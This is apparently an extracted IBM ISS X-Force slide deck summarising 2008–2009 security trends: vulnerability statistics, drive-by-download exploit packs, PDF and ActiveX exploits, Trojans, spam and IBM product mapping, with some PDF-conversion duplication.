Security Trends X-Force

Security Trends

X-Force

®

IBM Internet Security Systems (ISS)

Solutions

The IBM ISS X-Force

®

research and development team drives IBM

Security Innovation

Protection Technology Threat Landscape Forecasting Malware Analysis Public Vulnerability Analysis Original Vulnerability Research

Research

Technology

X-Force Protection Engines Extensions to existing engines

New protection engine creation

X-Force XPU’s Security Content Update

Development

Security Content Update QA

X-Force Intelligence X-Force Database

3

IBM X-Force Web Intelligence Lifecycle

•Develop Protection •Deliver Updates

•Apply Updates •Monitor Browsing of:

•Million of End-users

•Thousands of Customers

•Hundreds of Countries

•Block Malicious Links •Send Links to Cobion •Deep Crawl of Known

Malicious Websites •Analyze New Exploit

Techniques

•Provide New Protection Guidance

•Classify MSS Links •Find Related Websites

(Deep Crawl) •Search for Malware •Find New Malicious Websites •Block All Malicious Domains

The mission of the

IBM Internet Security Systems

™

X-Force

®

research and development

team is to:

Research and evaluate threat and protection issues

Deliver security protection for today’s security problems

Develop new technology for tomorrow’s security challenges

Educate the media and user communities

X-Force Research

10B

analyzed Web pages & images

150M

intrusion attempts daily

40M

spam & phishing attacks

43K

documented vulnerabilities

Millions of unique malware samples

Provides Specific Analysis of:

Vulnerabilities & exploits

Malicious/Unwanted websites

Spam and phishing

Malware

Other emerging trends

5

Looks Can Be Deceiving: Vulnerability Disclosures

Decline but Exploitation Increases

Declines in some of the largest categories of vulnerabilities

Slowing disclosure rate is due to the disappearance of the

low-hanging fruit from currently researched categories and

existing applications

Exploits targeting these vulnerabilities are increasing,

especially SQL injection and ActiveX controls.

• High vulnerabilities are down 6%YOY

• Medium vulnerabilities are up to 62%of the vulnerabilities (8% YOY increase)

YOY = year over year

Patches Still Unavailable for Half of Vulnerabilities

Top 10 categories of operating

systems account for

89%

of all

operating system vulnerability

Operating System

Percentage of Critical and High

Percentage of All OS Vulnerabilities

Microsoft 39% 14%

Apple 18% 24%

Sun Solaris 14% 26%

Nearly half

(

49%)

of all vulnerabilities

disclosed in the first half of 2009 had no

vendor-supplied patches to remedy the

vulnerability

*Vendors with twenty or more disclosures in 1H 2009 **IBM Disclosures 82, Unpatched 3, % Unpatched 3.7%

7

The Economics of Attacker Exploitation

Document Reader vulnerabilities:

• Widely deployed

• Public exploits

• Fits the drive-by-download business model

Exchange TNEF vulnerability:

• Widely deployed

• Valuable data

• No public exploit

• No plug and play business model

The drive-by-download process

Desktop Users

Browse The Internet Malicious iframe

host Web server with

embedded iframe Web browser targeted Downloader installed Malware installed and activated

Exploit material Served

9

Malicious Web Links Increase by 508% YOY

Personal homepages (typically hosted by communication service company domains) account for approximately half of all the domains hosting at least one malicious link

Hosts that have 10 or more, pornography accounts for nearly 28% and gambling accounts for more than 14%

One or More Malicious Links

Ten or More Malicious Links

11

SQL Injection

SQL Injection

13

SQL Injection Attack Tools

* Automatic page-rank verification * Search engine integration for finding “vulnerable” sites

* Prioritization of results based on probability for successful injection * Reverse domain name resolution * etc.

The Economics of Attacker Exploitation

Document Reader vulnerabilities:

• Widely deployed

• Public exploits

• Fits the drive-by-download business model

Exchange TNEF vulnerability:

• Widely deployed

• Valuable data

• No public exploit

15

The Three Legged Stool

Web App Vulnerabilities Continue to Dominate

50.4% of all vulnerabilities are Web

application vulnerabilities

SQL injection and Cross-Site Scripting

are neck and neck in a race for the top

spot

17

Web App Vulnerabilities Continue to Dominate

Security and Spending are Unbalanced

“The cleanup cost for fixing a bug in a homegrown Web application ranges anywhere from $400 to $4,000 to repair,

depending on the vulnerability and the way it's fixed.” -Darkreading.com

The drive-by-download process

Desktop Users Downloader_installed

Malware installed and activated

Exploit material Served

19

Web Browsers are Complicated and Vulnerable

Largest number of client-side vulnerabilities in the first half of 2009 affects Web browsers and their plug-ins

Mozilla Firefox surpasses Microsoft Internet Explorer for the 1st_time.

Decline in Disclosures Does Not Impact Exploitation

Decline in ActiveX disclosures does not appear to be making an impact on exploitation.

Three of the five most popular exploits are ActiveX controls.

Rank 2008 H2 2009 H1

1. Microsoft MDAC RDS Dataspace ActiveX (CVE-2006-0003)

Microsoft MDAC RDS Dataspace ActiveX (CVE-2006-0003)

2. Microsoft WebViewFolderIcon ActiveX

(CVE-2006-3730) Microsoft Snapshot Viewer ActiveX (CVE-2008-2463) 3. Internet Explorer "createControlRange"

DHTML (CVE-2005-0055)

Adobe Acrobat and Reader Collab.CollectEmailInfo (CVE-2007-5659) 4. RealPlayer IERPCtl ActiveX

(CVE-2007-5601)

Microsoft IE7 DHTML Object Reuse (CVE-2009-0075) 5. Apple QuickTime RSTP URL

(CVE-2007-0015) RealPlayer IERPCtl ActiveX (CVE-2007-5601) Most Popular Exploits

First time that a PDF exploit is in the top 5 list.

21

Vulnerabilities in Document Readers Skyrocket

Portable Document Format (PDF) vulnerabilities disclosed in the first

half of 2009 has already surpassed disclosures from all of 2008.

PDF disclosures traded places with Office document disclosures to

take the top spot.

Points to Consider:

• Users trust .PDF more than .EXE

• PDF exploits becoming a popular

method of attack

Adobe Security Update: APSB09-07

An anonymous researcher reported through TippingPoint’s Zero Day Initiative (CVE

An anonymous researcher reported through TippingPoint’s Zero Day Initiative (CVE--2009

2009--1855)

1855)

Jun Mao and Ryan Smith, iDefense Labs (CVE

Jun Mao and Ryan Smith, iDefense Labs (CVE--2009

2009--1856)

1856)

Haifei Li of Fortinet's FortiGuard Global Security Research Team (CVE

Haifei Li of Fortinet's FortiGuard Global Security Research Team (CVE--2009

2009--1857)

1857)

Apple Product Security Team (CVE

Apple Product Security Team (CVE--2009

2009--1858)

1858)

Matthew Watchinski, Sourcefire VRT (CVE

Matthew Watchinski, Sourcefire VRT (CVE--2009

2009--1859)

1859)

Alin Rad Pop, Secunia Research (CVE

Alin Rad Pop, Secunia Research (CVE--2009

2009--0198)

0198)

Will Dormann, CERT (CVE

Will Dormann, CERT (CVE--2009

2009--1861)

1861)

Nicolas Joly, VUPEN Security (CVE

23

Popular drive-by-download exploit packs

WebAttacker2

Mpack

IcePack

Localized to French in May 2008

Firepack

Neosploit

Black Sun

Cyber Bot

IcePack

First appeared in July 2007

Two Versions of IcePack

• Basic Version “IcePack Lite Edition” (only has exploits for MS06-014 and MS06-006) and sold for $30

Advanced version “IcePack Platinum Edition”, sold for around $400

Produced by “IDT Group” in Russian

• English and French available

Licensed on a per-website Basis

Contains Web browser

optimized exploit pages

/exploits/i.php

Optimized for Internet Explorer Contains WinZip exploits, QuickTime overflow, MS06-057 WebViewFolderIcon, MS06-055 VML

/exploits/movie.bin QuickTime overflow exploit /exploits/f.php

Firefox optimized version of MS06-006 exploit

/exploits/o.php

Opera optimized version of MS06-006 exploit

25

Javascript Obfuscation

The level of obfuscation found in Web exploits, and, especially, PDF files continues to rise.

Some of these techniques are being passed to malicious multimedia files as well.

From Q1 to Q2 alone, the amount of suspicious, obfuscated content monitored by IBM ISS Managed Security Services nearly doubled.

27

The drive-by-download process

Desktop Users

Browse The Internet Malicious iframe

host Web server with

embedded iframe Web browser targeted Downloader installed Malware installed and activated

Exploit material Served

Information Stealing Trojans and Fraud Tools Increasing

Trojans make up 55% of all

Malware

Infostealers & Downloaders are the most common subcategories

• Infostealer Trojans target online games as well as banking credentials

29

Trojan Creator Kits

Constructor/Turkojan

V.4 New features

Remote Desktop Webcam Streaming Audio Streaming Remote passwords MSN Sniffer Remote Shell

Advanced File Manager

Online & Offline keylogger

Information about remote computer

Etc..

31

Commercial Anti-debugging Tools for Malware Authors

Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine.

Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs , OCXs , ActiveX controls, screen savers and device drivers).

instructions.

Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions.

Malware Quality Assurance

33

Spam Continues to Change to Avoid Detection

Spam is up approximately

40%

in 2009

60%

of spam classified as URL spam

Using “trusted” domains and “legitimate links” continues to help avoid anti-spam technologies

Brazil, the U.S., and India account for about

30%

of worldwide spam

Image-based Spam has returned

Most Common Domains in URL Spam, 2009 H1

35

Anonymity through botnet agents

SOCKS Jump Point

Many tools and services rely upon compromised hosts (typically botnet agents) to provide SOCKS proxies as anonymous exit/jump points.

services increasing year over year

Anonymous

Proxies

Volume of proxy services increasing year over year

37

A Tale of Two Worms

MS03-026 :

Buffer Overrun In RPC Interface Could Allow Code Execution

• Patched – July 2003 • Specially crafted RPC requests

• MS Blaster Worm – Released August 11th₂₀₀₃

• Propagation rate peaked within 8 hours • Microsoft: Between 8 and 16 million infections

MS08-067 :

Vulnerability in Server Service Could Allow Remote Code Execution

• Patched – October 23, 2008 • Specially crafted RPC requests • Gimmiv.A – Not very effective

• Conficker.A – November 20th_{- Not very effective}

• Conficker was a non-story in December of 2008

Internet Security has improved in 2008

• Widespread use of Windows Update

• Better use of security tools – Firewalls, IPS, Antivirus

39

IBM’s Comprehensive Approach Mitigates the Threat

People and Identity

• Threat: Cracking of weak Windows Domain passwords • Solution: Good network access control management

Data and Information

• Threat: Autorun - Peer to Peer drive mapping and Thumb-drives • Solution: Managed central file sharing with good access controls,

anti-virus, and backup

Application and Process

• Threat: Exploitation of remote code execution vulnerabilities • Solution: Effective device inventory and policy compliance focused on

vulnerability and patch management

Network, Server, and End Point

• Threat: Automatic network propagation

• Solution: Intrusion Prevention at the Network, Server, and Host that can identify and preemptively prevent 0-day threats

41

X-Force 2008 Trend & Risk Report – Summary

Vulnerabilities are at a high plateau

Secure Web presence has become the Achilles heel of corporate IT security

Mass endpoint exploitation is happening not only through browser vulnerabilities, but also through malicious movies and documents like Adobe PDF files

Successful exploitation typically leads to the installation of information-stealing Trojans

43

2008 X-Force Annual Trend & Risk Report – Mapping to IBM Portfolio

Area of Risk IBM Security Solutions

Vulnerabilities - IBM ISS Intrusion Prevention System (IPS) products: Proventia Network IPS, Proventia Server, RealSecure Server Sensor, Proventia Desktop & Proventia Multifunction (MFS)

-IBM ISS Managed Protection Services for IPS - Tivoli Security Information and Event Manager (TSIEM) Web Application

Vulnerabilities

- Web application IPS security for Network, Server and MFS (April marketing launch) - Managed Protection Services for IPS

- Rational Appscan for assessment -Rational Appscan Enterprise

- Tivoli Security Information and Event Manager - Tivoli Security Policy Manager

PC Vulnerabilities including Malicious Web Exploits

- IBM ISS Intrusion Prevention System (IPS) product lines (see above list under vulnerabilities) - Managed Protection Services for IPS

- Managed Security Services for Web Security - Proventia Web Filter

Spam Mail security offerings:

- Proventia Network Mail / Lotus Protector - Proventia Multifunction System (MFS) - Managed Security Services for Mail Security Unwanted Web

Content

- Proventia MFS

- Managed Security Services for Web Security - Proventia Web Filter

Malware - Proventia Desktop and MFS

- Managed Security Services for Mail and Web Security - Proventia Network Mail / Lotus Protector - Proventia Web Filter